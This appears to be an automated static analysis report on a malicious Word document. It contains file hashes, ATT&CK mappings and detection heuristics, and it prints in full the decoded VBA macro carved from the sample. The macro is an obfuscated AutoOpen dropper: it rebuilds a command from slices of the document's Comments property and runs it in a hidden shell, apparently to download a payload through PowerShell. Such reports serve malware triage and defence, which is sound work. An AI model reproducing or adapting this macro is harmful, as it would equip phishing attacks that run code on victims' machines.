Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cdfd10cc72306ef4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 99.8 KB
Created: 2017-10-11 10:50:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 692bcd2defa0275a5f36de36aec7841d
SHA-1: a5827636f05a60d4db224b7765966ead83cbe986
SHA-256: cdfd10cc72306ef415649ffeb1843309a7c87b1ff166884fa5249f47f203b388
Risk Score: 212

Malware Insights

MITRE ATT&CK:
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Word document (OLE) containing VBA macros. An AutoOpen macro calls EVjpGsLdH, which rebuilds a command string from dozens of Mid/Left/Right slices of the document's built-in "Comments" property and passes it to VBA.Shell$ with window style 0 (hidden); the macro also references PowerShell, indicating an attempt to execute commands. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports the malicious verdict. The primary function appears to be downloading and executing a secondary payload via PowerShell.

Heuristics (8)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected [medium; 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
      jpBrTMNBoS = OTsFR + SVlLFWE + jdPQJCLLJj + UzRjzHF + rIrss + kosDdT + TlFQhtHJZCz + fGPwzhr
      VBA.Shell$ jpBrTMNBoS, 0
      End Sub
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
      End Sub
      Sub AutoOpen()
      EVjpGsLdH
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6971 bytes
SHA-256: 682fdbacf2faedfc59c6417e7435aeceddd1ac56fd4049c502e10a11b518d95d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
38 of 67 identifiers look randomly generated (e.g. 'pTlLTHlJJQu') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub EVjpGsLdH()
QiKWpSR = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5755, 139)
ioRPPc = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4632), 117)
vwwOFfwRO = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7264), 169)
zMsVfEvVZXm = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14253), 179)
SJwKw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8086), 38)
QIohNw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7657), 125)
COFaKW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15828, 129)
pTlLTHlJJQu = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 919), 2)
jmVjtirYKHh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5027), 6)
SLSLUfzOH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 16277), 195)
WuJXfY = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14810), 69)
FOTbk = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12296), 89)
riWiMDH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11420), 174)
ZrwwOwhcuK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13795, 76)
SsciHOKTzo = QiKWpSR + ioRPPc + vwwOFfwRO + zMsVfEvVZXm + SJwKw + QIohNw + COFaKW + pTlLTHlJJQu + jmVjtirYKHh + SLSLUfzOH + WuJXfY + FOTbk + riWiMDH + ZrwwOwhcuK
HhrhZkSWKc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6046, 73)
aKOpq = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8399), 19)
tafozPDvo = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8838), 73)
FMJoqnIC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8884), 113)
jSIQkcjEw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12197), 80)
ftHPb = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 233), 178)
RWpiUnXftm = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12864), 115)
hnAAJIXY = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9355), 176)
WqrXPaSCZP = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4534), 123)
llrFzVs = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 9293), 87)
ulWwTitzG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11476), 141)
ciAwmwX = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11458), 2)
qMEfRC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15371, 168)
EKCfKD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14568, 113)
VbvvZ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 122), 96)
KZnGltS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8613, 27)
vrsijqiRPkt = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10968), 75)
pSaYt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1556), 121)
bBmmutG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1626), 98)
dPlJEkSKtYi = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 193), 19)
jpKWIkUjM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3211, 67)
fVuEG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12547, 174)
kAVlVHmzFA = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2269, 4)
wJuTCjKiUQh = SsciHOKTzo + HhrhZkSWKc + aKOpq + tafozPDvo + FMJoqnIC + jSIQkcjEw + ftHPb + RWpiUnXftm + hnAAJIXY + WqrXPaSCZP + llrFzVs + ulWwTitzG + ciAwmwX + qMEfRC + EKCfKD + VbvvZ + KZnGltS + vrsijqiRPkt + pSaYt + bBmmutG + dPlJEkSKtYi + jpKWIkUjM + fVuEG + kAVlVHmzFA
XZGiP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 512, 10)
qGUFYH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1811, 151)
mKZksbo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13049, 16)
YoaqpwklU = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6341), 166)
QGaqjf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10769), 107)
aOibw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10125), 180)
GHuXfjzcF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8228, 90)
XBHkTDkD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 737, 89)
jjAMVlzPt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3582), 185)
bHscrzsbQ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9552, 46)
PIHEvqu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6890), 122)
tPBWYtKJwA = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6042), 48)
OTsFR = wJuTCjKiUQh + XZGiP + qGUFYH + mKZksbo + YoaqpwklU + QGaqjf + aOibw + GHuXfjzcF + XBHkTDkD + jjAMVlzPt + bHscrzsbQ + PIHEvqu + tPBWYtKJwA
SVlLFWE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1277), 140)
jdPQJCLLJj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14415), 107)
UzRjzHF = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15645), 74)
rIrss = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5388, 119)
kosDdT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4141, 127)
TlFQhtHJZCz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9199), 7)
fGPwzhr = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6608), 1)
jpBrTMNBoS = OTsFR + SVlLFWE + jdPQJCLLJj + UzRjzHF + rIrss + kosDdT + TlFQhtHJZCz + fGPwzhr
VBA.Shell$ jpBrTMNBoS, 0
End Sub
Sub AutoOpen()
EVjpGsLdH
End Sub